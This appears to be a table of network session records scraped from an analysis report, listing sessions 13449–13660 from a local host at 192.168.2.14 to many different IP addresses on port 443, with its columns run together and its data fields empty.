                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13449192.168.2.143791613.135.8.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13450192.168.2.1446358184.175.180.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13451192.168.2.1453810158.162.146.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13452192.168.2.1442566181.180.28.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13453192.168.2.1452948163.150.246.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13454192.168.2.1452092165.226.16.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13455192.168.2.1436776216.97.60.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13456192.168.2.144629235.211.190.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13457192.168.2.143830012.242.19.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13458192.168.2.1447074199.236.197.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13459192.168.2.1448802180.224.118.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13460192.168.2.143345435.185.161.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13461192.168.2.1448386149.108.175.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13462192.168.2.1447836115.172.140.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13463192.168.2.1451800193.123.48.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13464192.168.2.14437481.221.115.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13465192.168.2.144830466.123.66.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13466192.168.2.1439878211.10.175.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13467192.168.2.1439802161.39.191.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13468192.168.2.1451178202.255.171.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13469192.168.2.144948459.250.82.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13470192.168.2.143568281.18.55.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13471192.168.2.1437722190.240.180.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13472192.168.2.1442610213.113.214.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13473192.168.2.144720025.10.145.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13474192.168.2.1437292154.115.92.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13475192.168.2.1449340104.241.160.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13476192.168.2.145362618.111.151.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13477192.168.2.145837840.187.171.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13478192.168.2.1432900190.103.204.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13479192.168.2.143850432.225.173.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13480192.168.2.144816452.245.228.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13481192.168.2.1452604102.180.139.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13482192.168.2.145644481.1.204.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13483192.168.2.143470453.166.187.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13484192.168.2.1456090166.246.102.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13485192.168.2.145198638.118.218.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13486192.168.2.1453920111.204.31.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13487192.168.2.1457654110.51.115.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13488192.168.2.1449292106.121.5.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13489192.168.2.143458214.157.31.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13490192.168.2.144959083.11.182.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13491192.168.2.144346682.83.141.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13492192.168.2.145762261.104.230.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13493192.168.2.1445336220.67.73.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13494192.168.2.1448814189.102.145.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13495192.168.2.146039643.55.9.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13496192.168.2.1449990116.112.217.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13497192.168.2.1449468151.187.149.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13498192.168.2.1435456206.118.135.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13499192.168.2.145462292.113.164.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13500192.168.2.144023670.187.93.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13501192.168.2.1437732133.209.79.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13502192.168.2.1446542114.239.28.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13503192.168.2.1451258216.120.95.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13504192.168.2.1444204221.24.96.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13505192.168.2.145627297.61.131.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13506192.168.2.145511459.91.163.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13507192.168.2.144800073.204.68.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13508192.168.2.143452224.165.244.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13509192.168.2.1452820166.116.208.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13510192.168.2.1456002162.114.105.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13511192.168.2.1436860186.223.32.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13512192.168.2.1444062123.108.224.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13513192.168.2.145042884.248.37.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13514192.168.2.1443736193.33.201.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13515192.168.2.1438524205.180.77.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13516192.168.2.1438424183.210.67.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13517192.168.2.145093266.203.147.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13518192.168.2.1452954167.205.83.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13519192.168.2.1439480131.171.176.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13520192.168.2.1443536204.65.11.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13521192.168.2.145090437.11.78.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13522192.168.2.1449606219.215.197.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13523192.168.2.144006487.112.251.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13524192.168.2.1441312187.141.132.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13525192.168.2.146049686.94.153.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13526192.168.2.1448042146.131.144.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13527192.168.2.144060466.138.238.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13528192.168.2.143772082.157.145.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13529192.168.2.145539469.94.142.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13530192.168.2.14584505.251.210.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13531192.168.2.1454554201.40.186.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13532192.168.2.144768859.224.178.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13533192.168.2.1460436158.144.190.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13534192.168.2.1447216160.125.234.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13535192.168.2.1454360138.106.112.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13536192.168.2.144196423.252.60.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13537192.168.2.1435816113.178.59.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13538192.168.2.1435732190.182.237.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13539192.168.2.144419461.127.26.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13540192.168.2.1451630148.192.244.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13541192.168.2.1445804125.205.156.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13542192.168.2.1459878199.23.148.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13543192.168.2.1449766180.206.182.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13544192.168.2.1440954173.236.29.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13545192.168.2.145630267.213.22.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13546192.168.2.143520060.167.240.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13547192.168.2.1453926114.115.45.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13548192.168.2.1437492223.31.1.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13549192.168.2.145555497.220.222.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13550192.168.2.1443266126.107.184.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13551192.168.2.143972273.67.158.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13552192.168.2.144605475.195.122.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13553192.168.2.144118814.12.188.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13554192.168.2.144183235.23.67.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13555192.168.2.145183465.44.9.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13556192.168.2.1448192195.191.95.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13557192.168.2.144565053.242.166.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13558192.168.2.1444084155.6.243.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13559192.168.2.1441030195.4.161.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13560192.168.2.145724484.134.139.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13561192.168.2.1439000117.211.78.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13562192.168.2.145402045.218.229.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13563192.168.2.144526872.180.129.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13564192.168.2.143656073.192.42.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13565192.168.2.1452798100.129.16.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13566192.168.2.1435144176.19.57.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13567192.168.2.1455808107.135.237.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13568192.168.2.1457044164.66.177.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13569192.168.2.1435160171.91.216.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13570192.168.2.1441552167.237.152.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13571192.168.2.143370878.113.233.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13572192.168.2.1442738108.5.190.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13573192.168.2.145114475.110.135.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13574192.168.2.145992054.21.33.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13575192.168.2.143493419.207.231.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13576192.168.2.1453300122.63.180.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13577192.168.2.1440608109.90.233.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13578192.168.2.1436966164.74.141.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13579192.168.2.145608067.55.155.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13580192.168.2.1451354124.68.6.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13581192.168.2.1450336221.251.19.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13582192.168.2.145813498.181.249.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13583192.168.2.1435586184.249.56.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13584192.168.2.144505437.155.92.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13585192.168.2.145337678.104.246.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13586192.168.2.1449714200.149.203.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13587192.168.2.145951495.48.119.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13588192.168.2.1438864129.201.124.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13589192.168.2.1439920149.41.121.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13590192.168.2.144246668.150.77.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13591192.168.2.1445954160.8.92.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13592192.168.2.1454298162.230.38.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13593192.168.2.1452832152.16.210.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13594192.168.2.144605250.30.98.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13595192.168.2.1459988149.27.119.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13596192.168.2.144209425.152.192.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13597192.168.2.1456822164.107.91.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13598192.168.2.143867485.84.211.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13599192.168.2.1451262193.153.2.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13600192.168.2.145192237.9.235.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13601192.168.2.144861687.10.113.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13602192.168.2.1444482170.250.154.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13603192.168.2.1446102138.17.121.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13604192.168.2.14594908.205.178.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13605192.168.2.145439835.128.36.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13606192.168.2.145880250.137.126.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13607192.168.2.145622692.203.211.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13608192.168.2.1448810204.156.147.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13609192.168.2.144329253.139.15.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13610192.168.2.1450818179.68.178.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13611192.168.2.1451972111.156.14.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13612192.168.2.143408620.141.189.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13613192.168.2.145660059.140.210.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13614192.168.2.1454524102.74.15.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13615192.168.2.1442944122.112.205.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13616192.168.2.14488265.119.218.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13617192.168.2.1437464183.175.44.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13618192.168.2.144280413.14.100.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13619192.168.2.143929059.152.71.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13620192.168.2.1452084114.97.9.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13621192.168.2.144858891.89.143.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13622192.168.2.1447504201.57.122.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13623192.168.2.145672827.251.156.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13624192.168.2.1447844137.167.57.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13625192.168.2.1439538211.146.130.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13626192.168.2.14423868.90.250.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13627192.168.2.1440424203.161.130.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13628192.168.2.1459052188.126.116.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13629192.168.2.1433874211.84.233.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13630192.168.2.144652082.22.71.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13631192.168.2.1458642178.175.193.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13632192.168.2.144934894.83.194.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13633192.168.2.144043884.15.124.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13634192.168.2.1434088213.229.31.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13635192.168.2.144266225.63.44.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13636192.168.2.1434700220.116.149.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13637192.168.2.144333870.120.15.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13638192.168.2.1439120186.24.200.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13639192.168.2.1447780144.253.122.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13640192.168.2.1452176205.36.199.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13641192.168.2.1458938184.140.180.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13642192.168.2.1456136167.240.161.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13643192.168.2.1451602112.249.163.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13644192.168.2.1432894204.120.9.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13645192.168.2.145816644.177.196.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13646192.168.2.144982098.102.19.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13647192.168.2.145045872.5.107.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13648192.168.2.143402063.153.93.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13649192.168.2.1442352195.106.175.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13650192.168.2.144871096.15.222.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13651192.168.2.1435782147.156.206.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13652192.168.2.1453374165.164.28.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13653192.168.2.1438146191.79.121.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13654192.168.2.144325677.23.135.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13655192.168.2.145130870.47.177.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13656192.168.2.1439500217.190.254.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13657192.168.2.1453584131.129.225.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13658192.168.2.1455090219.25.165.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13659192.168.2.1440046146.198.46.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13660192.168.2.143381041.58.100.27443
                                                      TimestampBytes transferredDirectionData


